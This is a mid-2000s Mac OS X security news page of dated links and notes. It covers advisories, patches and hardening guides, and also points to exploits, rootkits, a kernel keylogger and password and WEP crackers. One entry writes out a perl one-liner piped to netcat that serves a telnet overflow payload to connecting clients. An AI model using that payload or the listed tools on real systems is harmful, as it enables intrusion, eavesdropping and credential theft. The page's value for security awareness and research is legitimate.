Hardening Your Macintosh
os x security, auditing, hardening, pen-testing, privacy & more...
updated 4.23.04

previous "what's new":
-

6.24.05 -
A Tour of the Mac OS X Kernel by Amit Singh recently presented to the NSA (flash)

6.21.05 -
Terminal Sniffer Method Swizzling POC by David Blyth - Download POC
logKext v2.0a Released for Tiger - FSB Software - Download
HastalaDS_Store - Angelo Laub's mach_injector fun er hack - Overwrites the C-function, which is responsible for the creation of new files (FSCreateFileUnicode). - translated blog post
binary - source code

6.20.05 -
HenWen 2.12 Released - Download

6.17.05 -
Adobe Reader XML External Entity Attack - 7.0 & 7.0.1 vulnerable

6.16.05 -
Mezcal 1.0 Released HTTP/HTTPS bruteforcing tool that allows the crafting of requests and insertion of dynamic variables on-the-fly.
Download

6.15.05 -
Java Web Start Untrusted Application/Applet Privilege Escalation - turn that darn Java OFF!

6.14.05 -
Mac OS X 10.4 launchd Race Condition Exploit by intropy (Computer Academic Underground)
CAU-launchd.c CAU-launchd-bf.sh
Mach_* 1.1 Released - Jonathan 'Wolf' Rentzsch
Download source package

6.09.05 -
Apple OSX multiple Bluetooth vulnerabilities discovered by Kevin Finisterre
Mac OS X 10.4 launchd race condition vulnerability discovered by Neil Archibald and Ilja Van Sprundel
Tunnelblick 2.0 Released for OS X 10.3 & 10.4 - "TunnelView" GUI for OpenVPN on the Mac - Previously OpenVPN-GUI
SourceForge WirelessDriver Beta 6 (for Tiger) Installer Package Released

6.08.05 -
Mac OS X Kernel Insecurities - Black Hat Briefings Europe 2005 presentation by Christian N. Klein & Ilja van Sprundel - The MacHackers (part of CCCBerlin). Information leaks, buffer overflows and Darwin security.
Security Update 2005-006 Released - Fixing numerous vulnerabilites.

6.07.05 -
Malicious Bundles on OS X - FSB Software
Mac OS X Hack & Crack fun pack 2005-04-18 - 356.12 MB's of Mac Hacking files, cracking, exploits, word lists, security tools, source code, binaries, shellcode, scripts and more. Package details
Download Torrent

6.02.05 -
QuickTime 7.0.1 Released - Apple fixes the QuickTime 7 information leakage.

5.28.05 -
ClamAV local privilege escalation vulnerability - Sentinel Chicken Networks

5.27.05 -
Forensic disk duplication modifies the evidence hard disk

5.26.05 -
Keynote 2.0.2 Released - Apple fixes security issues - Reported by David Remahl - POC
Computer Forensics and the ATA Interface - Commonly used disk imaging and wiping tools can be tricked to miss parts of a disk.
Apple Safari HTTPS Remote DoS vulnerability found by Gilbert Verdian - Safari 1.3 (v312) Exploit POC <- this will crash Safari

5.24.05 -
John 1.6.38 for MacOSX - Erik Winkler has john binaries. This version has all the patches from the openwall site applied plus some additional patches for raw sha-1 hashes and lotus v5 hashes.
FSLogger 1.0 beta - A File System Change Logger for "Tiger" from Amit Singh at kernelthread.com
CIS_OSX_Benchmark_v1.0.pdf released from the Center for Internet Security - OS X Benchmark Tool to be released very soon.
TTY Tickets - Close the sudo piggyback hole

5.20.05 -
Mac OS X 10.4.1 Update - Patches several new vulnerabilties in Tiger

5.19.05 -
Mac OSX 10.4.1 Dashboard Authentication Hijacking Vulnerability by Jonathan Zdziarski

5.17.05 -
Cert Technical Cyber Security Alert TA05-136A - Apple Mac OS X is affected by multiple vulnerabilities
Mac OS X - Adobe Version [C] version Exploit by ActionSpider - bugtraq archive

5.16.05 -
At Your Disservice - How ATA security functions jeopardize your data - c't magazine
Mac OS X kernel extension ATASecurity.kext - Download

5.15.05 -
I know what you downloaded from Freenet - Anonymous P2P network open to easy forensic attack

5.14.05 -
CLIX 1.6b Released - From Rixstep
Safari / Dashboard vulnerability in OS X 10.4 - Some more evil Dashboard possiblities from Aaron Harnly
Mac Worm X - News from Rixstep "This hasn't been done, but given the enormous help offered by Dashboard, it will be - and soon. This is how it will work."...
Paros v 3.2 Released - for web application security assessment. A java based web proxy for testing the security of web applications. All HTTP and HTTPS data between server and client, including cookies and form fields, can be intercepted and modified.
Make It and Break It: Preventing Session Hijacking and Cookie Manipulation - Your Web Apps May Already Be at Risk

5.13.05 -
Quartz Composer / QuickTime 7 information leakage by David Remahl - POC

5.11.05 -
John the Ripper 1.6.38 Released - Now with official Altivec support. A significant number of code optimizations by Solar Designer of the altivec code improves performance quite a bit for DES and LM hashes under MacOS X.

5.10.05 -
Grokking Darwin ACLs
Apple iTunes MPEG4 Parsing Buffer Overflow Vulnerability by Mark Litchfield of NGS Software - Fixed in Apple iTunes 4.8
Malicious Widget Installation on MacFixIt - yesterday

5.08.05 -
Zaptastic - Blueprint for a widget of mass destruction ? Malicious Web Pages Can Install Dashboard Widgets
OS X 10.4 New-account-wizzard in Mail 2.0 sends clear-text passwords by Markus Wšrle

5.06.05 -
4d WebSTAR 5.x Web Server Mac OS X Buffer Overflow with POC by Braden Thomas
Darwin Ports 1.0 released 2500+ ports and counting.

5.05.05 -
Norton Anti-Virus having problems with identifying trojans - MacEnterprise List - NAV info

5.04.05 -
OS X vpnd Server_id Buffer Overflow Vulnerability by Jason Aras

5.03.05 -
OS X 10.3 Security Update 2005-005 - Fixing a whopping 20 bugs.
David Remahl's 4 security vulnerabilities in OS X addressed in the most recent Security Udpate.
OS X Server NeST - target Buffer Overflow Vulnerability by Nico
OS X multiple Bluetooth vulnerabilities by KF

5.02.05 -
OS X Default Pseudo-Terminal Permission Vulnerability - Matt Johnston - Bugtraq / Security Focus
Common Criteria Tools for 10.4 - Download

5.01.05 -
OS X Cocktail 3.5.4 admin password disclosure - Bugtraq

4.29.05 -
Bastille for OSX - tarball available - Package coming soon
Online Hash Crackers - plain-text.info - passcracking.com - Sarca Rainbow Tables - Dictionary Based Hash Cracker

4.28.05 -
HOWTO bypass Internet Censorship by Freerk

4.27.05 -
ADMmutate 0.8.4 by K2- PPC Version - A shellcode mutation engine, can evade NIDS.
Mac/Cowhand - A Proxy Trojan - Coverage via MacinTouch and Sophos - Actual infections ?
Most likley a version on CowFight's UnderHand Proxy Server. Guide To Remove Underhand (v1.1)

4.25.05 -
HenWen 2.1.1 by Nick Zitzmann
Crack Me If You Can - some password hashes @ the deepquest.code511.com blog - CRACKED in a second or two!!
GPG Tools 1.2 Released
BrickHouse 1.3 by Brian Hill Released

4.22.05 -
Easy Mac Spoofing by Dust-X & FlacoAKAintruder - A set of scripts and some code to make the Stefan Esser's Airport Extreme MAC spoofing even easier.
Download MacSpoofer

4.21.05 -
Protect Your Source Code: Obfuscation 101 by Matthew Russell
A Brief Tutorial on Reverse Engineering OS X by Rich Wareham
BypassIt by Nexus 9 - Rooting OSX With Physical Access via FireWire
Download BypassIt v 1.1
Spoofing the MAC address on Airport Extreme cards by Stefan Esser - Finally some MAC spoofing for AE cards via patching the binary driver.
Dynamic method - Static Method
MacKrack 1.5 Released - FSB Software - Version 1.5 adds support for Tiger password extraction, as well as Tiger Salted SHA-1 algorithm.
Download

4.20.05 -
Binary Protection on Mac OS X by Braden - Binary protection using UPX.
PEFTool v1.6 by FSB Software - This is a PEF binary disassembler in its early stages of development. It currently parses all PEF headers, fully disassembles (with many known bugs), and unmangles C++ symbols.
Download

4.19.05 -
APPLE-SA-2005-04-19 Security Update 2005-004 - Apple finally fixes the iSync vulnerability. It's always an incentive to get with it, when others fix your holes before you do.
The Mac OS X Expert Challenge - 2005.1 by Amit Singh
Network Forensics Evasion: How to Exit the Matrix by Ace Evader - An detailed look at staying anonymous on the Internet. OS X information is being updated.
"Need to surf anonymously? Willing to put forth the extra brainpower to prevent The Boss or The Man from watching what you do online? Or perhaps you live in the shadows, and would like to hack with confidence for once. No matter what the motivation, the age of truly anonymous Internet access has not yet ended. In fact, it may have just begun." from the Introduction.
The latest version of this document can be found at https://n4ez7vf37i2yvz5g.onion/howtos/ExitTheMatrix <-- you must use tor to access this - local Mirror
iSyncProtector by Dominik Fusina - A patch for the unfixed iSync exploit
Download
Apple OS X 10.3.9 System Update - Fixes numerous vulnerabilities.

4.17.05 -
OS X Machine Compromised - Precursor to OS X Zombies ? - Early Febuary 2005 - Intrusion found on client machine by technician.
Terminal history indicates that the machine was accessed and numerous toolkits downloaded to the machine. Most addresses point to free Romanian ftp and web hosting sites. Packages downloaded include: psyDarwin a osx customized irc connection bouncer, sshss a ssh brute forcer/scanner scripts and linux binary, and mechDarwin an OSX customized irc bot. bash_history indicates that the attacker knows little about about the OSX operating system. The initial method used to compromise the machine is unknown.
AppleWebKit XMLHttpRequest arbitrary file disclosure vulnerability - David Remahl - Fixed in OS X 10.3.9 Update

4.16.05 -
MacKrack 1.43 Released - FSB Software - Fixes various bugs, adds performance stats, and increases speed of dmg cracking.
Download 1.43 - Wow 14,000+ downloads on MacUpdate!

4.6.05 -
PGP Desktop 9.0pb2 - New PGP beta available for testing.
OSX - Trojan apps can bypass authentication controls and gain root privilages - Advisory to bugtraq from bert@adbas.net
Download the POC
Check Failed Password Attempts - A simple gui to check secure.log logins and ssh logins.
Download v1.7

4.1.05 -
How to install and update the Checkmate tripwire - from afp548.com one of my daily sites
Bastille for OS X - working version coming very soon :)

3.30.05 -
Apple re-releases Security Update 2005-003 (Server) after fixes.
Absinthe is a gui-based tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection.
Download OS X v 1.3
telnet vuln is getting OS X machines hacked out there. Why run telnet?
perl -e 'print "\xff\xfd\x27\xff\xfa\x27\x01\x03","\x01"x"128","A"x"64","\xff\xf0"' | nc -lp 23
More virus contest follow-up.

3.26.05 -
OS X Virus contest - poof gone...
OS X Zombies in the wild - so not surprising.

3.22.05 -
"Apple has pulled Security Update 2005-003 (Server) 1.0 because of issues affecting Mac OS X Server's built-in Cyrus mail services. An updated version of the Security Update will be released in the very near future."
Symantec stirring the shit.
Mac OS X CF_CHARSET_PATH Buffer Overflow Vulnerability - iDefense & Anonymous
Apple Core Foundation "CF_CHARSET_PATH" Local Root Exploit by v9@fakehalo.us (fakehalo/realhalo)
New OSX Security Update 2005-003 is out - still no fix for iSink exploit and others...
ExploitTree is a categorized collection of ALL available exploit code available via cvs. ExploitTree's ambition is to become the most organized, rich and up-to-date exploit repository on the internet.

2.15.05 -
Intrusion Detection with Snort/ACID on Mac OS X 10.3 - A Snort/ACID HOWTO for Mac OS X by By Mark Duling

2.14.05 -
IDN Spoofing Defense for Safari in response to the Shmoo Group's release of a new domain spoofing exploit.
New GIAC paper by Cory Altheide - Poisoning the Apple: Exploiting the Apple File Server
An interesting paper that covers the AFP exploit process and possible attack and response.
Erik Winkler has updated his OS X John the Ripper distribution. Now supports all ciphers from 1.6.37 patches plus the new mscash cipher released by Simon Marechal (http://www.cr0.net:8040/misc/patch-john.html).
JTR 1.6.37 package
-
AppleFileServer (AFS) "FPLoginExt" Remote Denial of Service Exploit by nemo
-
Mac OS X "Finder/DS_Store" Arbitrary File Overwriting Exploit - by vade79
Mac OS X - Adobe Version Cue Local Root Exploit - a new POC by 0xdeadababe
-
Apple 'quicktime.qts' Error in Parsing 'qtif' Images Lets Remote Users Deny Service - discovered by ATmaCA
A demonstration exploit header is available at: http://www.atmacasoft.com/exp/vuln.qtif.zip
-
MacOS X at scheduling utilities privelege escalation - Bug found by Kevin Finisterre
DMA[2005-0127a]
Mac OS X 10.3 iSync "mRouter" Local Privilege Escalation Exploit - Bug found by Braden Thomas , exploit written by nemo.
fm-iSink.c
-
nemo has released some notes on Darwin Kernel Vulnerabilities and a kernel DOS exploit.
fm-nacho.txt
-
ImmunitySec released: Multiple Local Vulnerabilities in Mac OS X
pdf open office
-
nemo has also written Term-inator - Ptrace Terminal.app, stopping the system from being reboot etc. a Small DoS for OSX < 10.3.7
-
nemo has released a POC exploit for iTunes 4.3.7 on OS X 10.3.7. Shellcode binds a shell to port 4444.
Slashdot mirror
iDEFENSE Security Advisory 01.13.05 - Remote exploitation of a buffer overflow vulnerability in Apple Computer Inc.'s iTunes music player allows attackers to execute arbitrary code. The problem specifically exists when parsing playlist files that contain long URL file entries.
ATmaCA has released a remote Apple iTunes Playlist buffer overflow download shellcoded exploit. Versions up to 4.7 are affected. Tested with iTunes v4.7 on WinXP SP2 EN.
-
FSB Software has released an updated version of logKext v1.2 a kernel extension keylogger.
Mirror of Aaron Linville's complete dsniff package with Libnids, Libpcap and Libnet.
rumors of a new dsniff beta version soon...
-
Metasploit Framework 2.3 Released with 46 exploits and 68 payloads - Includes some new Mac OS X fun:
New size-optimized Mac OS X encoders and payloads
New OSX shellcodes
Samba trans2open() Buffer Overflow (Mac OS X)
4D WebSTAR FTP Server Buffer Overflow (Mac OS X)
download/
-
Angelo Laub's slides from his presentation "Mac OS X Insecurity" at the 21C3 congress.
Also his paper entitled Mac OS X Insecurity is available.
-

0.0.9.2 bundle with privoxy, tor and auto-startup - download
Mac OS X Documentation
-
Stack Smash Protector ( ProPolice ) for OpenDarwin 7.2.1 - Sam Hart has released a patch for ProPolice
Erik Winkler has posted John 1.6.37 source heavily optimized for MacOSX compilation. The binary included in the run directory has been compiled with IBM's xlc compiler and yielded a 20% speed boost over Apple's compiler for the LM hash cracking. See the README for more information.
download the 1.6.37 package
-
Priv8 Directory Service local root exploit - OS X 10.2.4
priv8osx.sh
-
Hackenslacker has three interesting articles:
GetCracking 10.3 - Covers obtaining hash files for Mac OS X 10.3.
Getting SUM - Covers booting into Single User Mode under Mac OS 10.x.
John.txt - Covers downloading and installing Apple's Developer Tools, and John the Ripper.
-
Paul Day's Network/performance/security tweaks for MacOSX.
Erik Winkler has again released some pumped up John the Ripper binaries. - download
This time the builds are optimized for Altivec and have numerous other patches from Solar Designers site. Some benchmarks from the new patches.
Were still looking for G5 users to test the enclosed binaries, email Erik or me.

Altivec Benchmarking: Traditional DES [32/32 BS]... DONE Many salts: 663680 c/s real, 712103 c/s virtual Only one salt: 526668 c/s real, 544079 c/s virtual
For comparison, the MMX version on a 3 GHz P4 is:
Benchmarking: Traditional DES [64/64 BS MMX]... DONE Many salts: 758314 c/s Only one salt: 643683 c/s
-
Mac OS X / Adobe Version Cue local root exploit POC by Jonathan Bringhurst - local
-
Paul Day has released a detailed and concise paper and slides titled "Securing Mac OS X".
Paul also has another great writeup: Compiling a Mach/xnu kernel for MacOSX
New version of AirCrack 2.1 for OS X released: os x binaries - aircrack home
-
The new Ettercap NG 0.7.x is pretty darn cool, especially with the gtk interface. Install from source or via fink or darwinports
Also check out this script archive recently released to help out Enhancing Ettercap for Mac OS X (SSL!)
The Onion Router / torify HowTo wiki
-
Erik Winkler has compiled G4 & G5 optimized binaries of John the Ripper for MacOSX. Erik is looking for G5 users to test the enclosed binaries and sample LANMAN hash file pwdump_test.txt
In test it took 36 seconds to crack all the hashes on a 12" 1.33 Ghz powerbook test1 test 2
Compiled versions are available for download
Johny Cache test 10.3.5 mac_kernel
Chroot ssh user account by Masaki Ogawa - english japanese
-
The U.S. National Security Agency (NSA) has released a 100 page guide to securing the OS X Operating System.
NSA download
-
Opener (Renepo) "a startup script to turn on services and gather user info & hashes for Mac OS X". The so-called "Virus", "Trojan", "Malware" - Opener version 2.3.8
Threads at MU Forums: dev discuss
JohnnyCache's kernel spoofing extension not working for wireless connections - kismac mailing list thread.
FSB Software has released logKext v 1.1 a kernel extension keylogger. Version 1.1 contains a command-line client that allows communication with the daemon, as well as strong logfile encryption. source
Maximillian Dornseif over at RedTeam has released some patches to compile various forensic tools on the mac:
dd_rescue-1.10-mac.patch - foremost-0.69-mac.patch - gpart-0.1h-mac.patch - md5deep-1.5-mac.patch
He's also done some work on getting socat working via darwinports - dports-dev
Derrick Donnelly, CTO, BlackBag Technologies presented a session entitled "Open Source Digital Forensic Acquisition and Analysis on Mac OS X" at the recent Oreilly Mac OS X Conference.
Download presentation pdf
-
nemo has released WeaponX an OS X kernel extension rootkit that is roughly based off of adore. It hides itself from kextstat, netstat, utmp and wtmp.
wX.tar.gz packetstorm mirror
Johny Cache has released a beta MAC spoofing kernel patch for OSX/darwins xnu kernel. It accomplishes this by rewriting MAC addresses on the fly in and out of the wire. Also forges pertinent ARP payloads and includes a patched ISC dhcp client that is aware of the shadowmac interface.
shadowmac.tar.gz - packetstorm mirror - freshmeat project home
Johny Cache has also released a distributed WEP cracker. Support the ability to crack arbitrary sized keys, save the state, and a pretty ncurses interface. If you have only one machine it will still run. Screenshots 1 & 2
jc-wepcrack.tar.gz - packetstorm mirror
-
Incoming malicious kernel extensions. Two beta OS X kernel extensions have been released:
FSB Software has released logKext a kernel extension keylogger.
Doss has released Togroot a beta kernel extension rootkit.
AirCrack 2.0 for OS X - Aircrack is an 802.11 WEP cracking program that can recover a 40-bit or 104-bit WEP key once enough encrypted packets have been gathered.
os x binaries - aircrack home
MacNessus 0.1 - K9 Productions has released a Mac OS X gui for the Nessus security scanner.
mnessus.dmg - source
The first ever OS X Root Kit is released by gapple - Has a lot of standard tools included, adds a TCP backdoor via inetd, does data recon, and more.
osxrk-0.2.1.tbz - local mirror
Encrypted Swap on Mac OS X 10.3 (Panther) - This method uses an encrypted disk image for the swap files. I have only started testing it and have yet to have any problems so far.
EncryptedSwap 0.2.1 (2004-08-05)
AppleFileServer LoginExt PathName Buffer Overflow - Vulnerability Advisory - Exploit payload for the Metasploit Framework - Works on unpatched 10.3.3 systems, unknown 10.3.0-2. Does not work on unpatched 10.2.8 systems. afp_loginext
Mac OS 10.3 Server Security by Charles Edge (krypted) - DefCon 12 presentation August 2004
OSX Server Security.ppt - .pdf version
A Corsaire White Paper: Securing Mac OS X by Stephen de Vries - June 2004 - A thorough new security & hardening paper. 040622-securing-mac-os-x.pdf